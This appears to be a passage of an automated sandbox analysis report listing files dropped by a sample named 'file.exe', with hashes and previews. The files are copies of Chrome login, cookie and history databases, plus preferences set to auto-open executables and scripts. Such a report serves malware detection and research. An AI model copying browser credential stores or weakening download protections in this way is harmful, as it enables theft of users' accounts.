          Preview:2023/10/05-08:42:23.688 25ec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts/MANIFEST-000001.2023/10/05-08:42:23.689 25ec Recovering log #3.2023/10/05-08:42:23.689 25ec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\LOG.old

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):332
          Entropy (8bit):5.2620164020775375
          Encrypted:false
          SSDEEP:6:ku6Uaq2PcNwi23iKKdK865IFUtj6UTZmwxUTFkwOcNwi23iKKdK86+ULJ:ku6UavLZ5Kk/WFUtj6UT/xy54Z5Kk/+e
          MD5:E45197354DDBA2CED627825EA4FE6146
          SHA1:7A55DDB2255221BA04F44DA038FC7A48988DBCD9
          SHA-256:300BE503B2B5F027C7B2C53B92120BCD2B0656FA77CFD8758529578505CD12B0
          SHA-512:06188EC45F8C772B1C48C83F31724B934A369B2F57E5376A0DE8F44951CD42D05A2B2A56DBF58722EBACDB7FEA11BB4A1AB37F8C9A8EA25E36B252479A43E506
          Malicious:false
          Preview:2023/10/05-08:41:58.661 1db0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts/MANIFEST-000001.2023/10/05-08:41:58.661 1db0 Recovering log #3.2023/10/05-08:41:58.662 1db0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\MANIFEST-000001

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:OpenPGP Secret Key
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.704993772857998
          Encrypted:false
          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
          Malicious:false
          Preview:.|.."....leveldb.BytewiseComparator......

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\CURRENT

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):16
          Entropy (8bit):3.2743974703476995
          Encrypted:false
          SSDEEP:3:1sjgWIV//Uv:1qIFUv
          MD5:46295CAC801E5D4857D09837238A6394
          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
          Malicious:false
          Preview:MANIFEST-000001.

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\LOG

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):338
          Entropy (8bit):5.194422150316388
          Encrypted:false
          SSDEEP:6:kubenPq2PcNwi23iKKdKWT5g1IdqIFUtjbenCZmwxbenukwOcNwi23iKKdKWT5gZ:kubAvLZ5Kkg5gSRFUtjbh/xb754Z5Kkn
          MD5:D1B41CB3C06483A653C3A586433D4D33
          SHA1:B60DA9AC4F86C3220E15C0669C89FF2603310BF8
          SHA-256:B2BDFC42B3E96153602162966FAEEBAC84DA674DE9CC7EE639E5BE2394B4A577
          SHA-512:0AADF171D976A9C9A330F2784080929181E30184044B7FFF811B0F46CB34099CAC099D5C91526F6D3DEC6473B6C773D90404F40E668E3917B9B6527F2CC542CE
          Malicious:false
          Preview:2023/10/05-08:42:23.048 25f0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2023/10/05-08:42:23.048 25f0 Recovering log #3.2023/10/05-08:42:23.048 25f0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\LOG.old

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):297
          Entropy (8bit):5.239538279934225
          Encrypted:false
          SSDEEP:6:kuAUNF4M1cNwi23iKKdKWT5g1Iu2KLlTAGIq2PcNwi23iKKdKWT5g1IdqIFUv:kuAUF42Z5Kkg5gSiLxAGIvLZ5Kkg5gSS
          MD5:D0207D8334CFC8F8C297CE3DE5C9F99E
          SHA1:1FF5F1E768B70CE6F09B62DB89BB6E0CE026CECD
          SHA-256:F79537F7B45DCDA700BFBBEAC89B9338E0E07A80091D3318858A8B9D1DAB3C6A
          SHA-512:1907D0C9768722529CA0B3F6C47E18826FC86F81AA5CAE446DE4E8D5167AE553B38BD43E8B954186034D046CA8BEE125E043B2E219951E475AC122C46D04FA36
          Malicious:false
          Preview:2023/10/05-08:41:59.812 1cd4 Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption since it was missing..2023/10/05-08:41:59.850 1cd4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\MANIFEST-000001

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:OpenPGP Secret Key
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.704993772857998
          Encrypted:false
          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
          Malicious:false
          Preview:.|.."....leveldb.BytewiseComparator......

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Google Profile.ico

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
          Category:dropped
          Size (bytes):197794
          Entropy (8bit):6.548294817785579
          Encrypted:false
          SSDEEP:3072:HXm/EXUfaL6MV8nbsFXdFVgQAU6v4v62PV2Ey28nr6dOQriQWe4g2rJBXCy9enoN:HXUMCm4U6q62MEBi99g6JVCvoZhhl+No
          MD5:EF36A84AD2BC23F79D171C604B56DE29
          SHA1:38D6569CD30D096140E752DB5D98D53CF304A8FC
          SHA-256:E9EECF02F444877E789D64C2290D6922BD42E2F2FE9C91A1381959ACD3292831
          SHA-512:DBB28281F8FA86D9084A0C3B3CDB6007C68AA038D8C28FE9B69AC0C1BE6DC2141CA1B2D6A444821E25ACE8E92FB35C37C89F8BCE5FEE33D6937E48B2759FA8BE
          Malicious:false
          Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ......M..(............. .............................7...C.%.?...................@..,D.$.<...I.-.>.\............-H.(.B.....f....q.g...........H.".N.G....r...p....%.......N...>q.....}...s....-...$...H.k.(:..pv......r...'...1...''..1?..)9..5I..5P..(F..0F..)F.,....->.-7D.1=..1;..5>.,,......................................(............. .................................>..[A.".C..............W............?...F.$.>...5...*.9.................C.!TI.(.>...S.>......r.9..............XG.(.F.".V.@......S...P....-...........M.-.<.........V..q...p....F........."...R.#.6~M.......I..o#..q$...G.........)...Q.,.4W..;F.......N...L.....>...*...-...:e.X4B..'5..@Q..........@...)...3......T....0;.5D...;..!0..!/..-1..36..,$..............2>.W6D..7D..7D..4E..0F.[..........................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\History

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):159744
          Entropy (8bit):0.5394293526345721
          Encrypted:false
          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
          MD5:52701A76A821CDDBC23FB25C3FCA4968
          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
          Malicious:false
          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Login Data

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):40960
          Entropy (8bit):0.8553638852307782
          Encrypted:false
          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
          MD5:28222628A3465C5F0D4B28F70F97F482
          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Login Data For Account

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):40960
          Entropy (8bit):0.8553638852307782
          Encrypted:false
          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
          MD5:28222628A3465C5F0D4B28F70F97F482
          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network Action Predictor

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
          Category:dropped
          Size (bytes):45056
          Entropy (8bit):0.40293591932113104
          Encrypted:false
          SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
          MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
          SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
          SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
          SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Cookies

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.848598812124929
          Encrypted:false
          SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
          MD5:9664DAA86F8917816B588C715D97BE07
          SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
          SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
          SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Network Persistent State

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):2007
          Entropy (8bit):5.2516514012391085
          Encrypted:false
          SSDEEP:48:YXsXftsKfgCzs31sR0zsTVfuHNKsg+HIsPFz4YhbyDF:vfhfkObQ84N1hy
          MD5:3B98E883FE24503412BB454352A2DD68
          SHA1:0F08656DE7554E1ED1CEC75D5682870E6B8F9D51
          SHA-256:CE53900EEF550B942F1EC2B9F1FC5CF5E634F5883F095DE7633FA8A7475486D8
          SHA-512:53B26A5813965427B03B2F391832C02D72A9E45DB38547BCBEA45809A02E847AD63A8D6C748B3738165B2908625AFFDDC8DA64525337C839BE59DB72A5A71682
          Malicious:false
          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557341455086","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557344325466","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557344360994","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://chrome.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557346257748","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL3VwZGF0ZS5nb29nbGVhcGlzLmNvbQAAAA==",false],"server

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Reporting and NEL

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
          Category:dropped
          Size (bytes):36864
          Entropy (8bit):0.8409686518312441
          Encrypted:false
          SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBlKz:eIEumQv8m1ccnvS6lK
          MD5:066C47896BA50F8DCC30DCFF791F7970
          SHA1:CC57FEDC08A7262E55A78F58EF569172F8DCF95F
          SHA-256:0AA8291B0F8045A50A15475D1EAE46C5249952B0AB1BCE3CB392073CAE216817
          SHA-512:8E93906548518463DDB3EE0A2AE9A9F37827F00CE587DCF503265BD5E76210BAD5EEE46EF3A4D31E98E64A4F68C582DE2267D343D45D0E0851BB2F8C2DA0E4C9
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\TransportSecurity

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):355
          Entropy (8bit):5.478091947597365
          Encrypted:false
          SSDEEP:6:YWyWNvxzhNnV2bj8wXwlmUUAnIMOXdXhONhSDKWlBv31dB8wXwlmUUAnIMp5jA9/:YWy+NnYj+UAnI9dRFDBR7N+UAnI6A9qw
          MD5:51682A45877FEB21C2B0AF5FBAB62379
          SHA1:0BDBE5D09073CDEBD6D8623DFAC5E9F8EAECC030
          SHA-256:A10AAF981E3EC2552A55EB912C889C716C82E383D5EDE69B97700D9B8DF70057
          SHA-512:A77E78AC1ECB60257FB6CF7AB5F3E66C2A73CFFB660E9EC95B01CDD5049BB2CEA2D8E7E8CC3B4FC031395BB5DA71CD09285222D81340DFC1006668DE0603572E
          Malicious:false
          Preview:{"sts":[{"expiry":1728027741.976549,"host":"5EdUoB7YUY9zZV+2DkgVXgho8WUvp+D+6KpeUOhNQIM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1696491741.976551},{"expiry":1728028313.74421,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696492313.744215}],"version":2}

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Trust Tokens

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
          Category:dropped
          Size (bytes):36864
          Entropy (8bit):0.3886039372934488
          Encrypted:false
          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Preferences

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):9335
          Entropy (8bit):5.27624379017732
          Encrypted:false
          SSDEEP:192:lZqGmdAV57aJrHAEDU+V+FpKXFbbNtZCEXqT04rO:lUjdqcZD3Gpq/tZpXqT04C
          MD5:1992E740D826592865313682E5C3A392
          SHA1:C93D1202A2EB17BF78D5C619D135E33FC468F5F5
          SHA-256:49FE82E24E125CF4798740F45F7D325AF446509615F3BF9AB8E2653E2206994A
          SHA-512:DAFBE93B0A42799A080A33B922666B4DBD9A17C85C571E1162F20F4C4E417BB0085D01138F1E158E77A5D07CDCB9F0897F42FBD14D9A6638FC30822E47BAF1E6
          Malicious:false
          Preview:{"NewTabPage":{"PrevNavigationTime":"13340965340571520"},"account_tracker_service_last_update":"13340965311068969","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13340965310875286","apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"has_seen_welcome_page":true,"should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"commerce_daily_metrics_last_update_time":"13340965894528465","countryid_at_install":17224,"default_apps_install_state":3,"dips_timer_last_update":"13340965310976738","domain_diversity":{"last_reporting_timestamp":"13340965311068532"},"download":{"directory_upgrade":true,"always_open_pdf_externally":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PreferredApps

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):33
          Entropy (8bit):4.051821770808046
          Encrypted:false
          SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
          MD5:2B432FEF211C69C745ACA86DE4F8E4AB
          SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
          SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
          SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
          Malicious:false
          Preview:{"preferred_apps":[],"version":1}

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PrivateAggregation

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 2
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.3494502770750662
          Encrypted:false
          SSDEEP:12:TLyKjXWhNOUhhQvbKL2LzKFxOUwa5qguWfpbZ75fOS:TLhjXWjD20wzK6UwccWfp15fB
          MD5:92A8445F953152A4A4CDD1477CC1A372
          SHA1:44F52B73D6BFB593F153DB7376F768AB8FEFFB53
          SHA-256:E31AB956F376013575B8FC9E06ED294E9EE0851DAA6DDF68B8407458A812DD5F
          SHA-512:17DD96B4635C4E26D0A1738B8B267176AD2911B7491082C49DAF0A1490A9D59D1E2899755CB6611D3A3CB5E4A193C08086D1FEBFB576C13D9ECD6096F22F9E68
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.......d..g...d......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Secure Preferences

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):13856
          Entropy (8bit):5.565392460990894
          Encrypted:false
          SSDEEP:384:xVknXBx1kXqKf/pUZNCgVLH2HfCdIrUobHGeB3P:xmXBx1kXqKf/pUZNCgVLH2Hf+IrUorGK
          MD5:F456AA37B0B6C7034DB3FF0AB17F2936
          SHA1:6BA1314A2AEE9CEC912D0891E19E40DBF6C32BAA
          SHA-256:BBD1BFD54F0F3D2EA7F5D34BFB9368438623F3AD78D811790B9F1942C45F9FD3
          SHA-512:FF5791AF4ABE154A221651D05CB6E8A28EB7A41FC1B7694AD920114F307F0196238FED25427475DC6AEA69A668AC450427A6BB99295390BA2E6B6318CC712026
          Malicious:false
          Preview:{"download":{"directory_upgrade":true,"always_open_pdf_externally":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz:msi"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13340965310875704","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13340965310875704","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, e

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage\000003.log

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):213
          Entropy (8bit):2.7541301583060975
          Encrypted:false
          SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
          MD5:046CC08D163FC4578CD1B77A5D0965AC
          SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
          SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
          SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
          Malicious:false
          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage\CURRENT

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):16
          Entropy (8bit):3.2743974703476995
          Encrypted:false
          SSDEEP:3:1sjgWIV//Uv:1qIFUv
          MD5:46295CAC801E5D4857D09837238A6394
          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
          Malicious:false
          Preview:MANIFEST-000001.

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage\LOG

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):328
          Entropy (8bit):5.119605227789069
          Encrypted:false
          SSDEEP:6:kub+VNAVq2PcNwi23iKKdKrQMxIFUtjb+VNAgZmwxbM6NAIkwOcNwi23iKKdKrQq:kubqNAVvLZ5KkCFUtjbqNAg/xbFAI54Z
          MD5:59D8C03890F20F7CEDE1544C18951B93
          SHA1:2D2618987E460284E06644C379447FBB595873CC
          SHA-256:53D8C647B1C9BA33BF7D426740BFA5CDACEA3694B5179B18087116391C2D30ED
          SHA-512:CA8DF4001B00A6EEA065443FCD864CF2133E5FD6836C0B596130ECA3422918952A867DCC6B5AE9805EC09C8C01258248E088EC43AD777F5671AC5A7717CFBD3D
          Malicious:false
          Preview:2023/10/05-08:42:20.628 2830 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2023/10/05-08:42:20.628 2830 Recovering log #3.2023/10/05-08:42:20.630 2830 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage\LOG.old

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):328
          Entropy (8bit):5.213921765183054
          Encrypted:false
          SSDEEP:6:kuM2+q2PcNwi23iKKdKrQMxIFUtjM3ZmwxMo3VkwOcNwi23iKKdKrQMFLJ:kuM3vLZ5KkCFUtjM3/xMoF54Z5KktJ
          MD5:91E8A6F2463AEDA2BF0C6FE22B692A06
          SHA1:0A68B9F005541E31EDFC1150F183B4E7BE19311F
          SHA-256:53607FF4C92044441DD6FDE498DE12057043DA81E0329D8F1812EA383068960D
          SHA-512:EDD7982555EB65972026C64D2E7F31135183599C4F3693EAC48A166D38A1B4E967DA6732F910B8679A8DF2FC705A6765617B2BFD73BE8F478E8D0BC38B320FC3
          Malicious:false
          Preview:2023/10/05-08:41:55.573 1b78 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2023/10/05-08:41:55.574 1b78 Recovering log #3.2023/10/05-08:41:55.575 1b78 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage\MANIFEST-000001

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:OpenPGP Secret Key
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.704993772857998
          Encrypted:false
          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
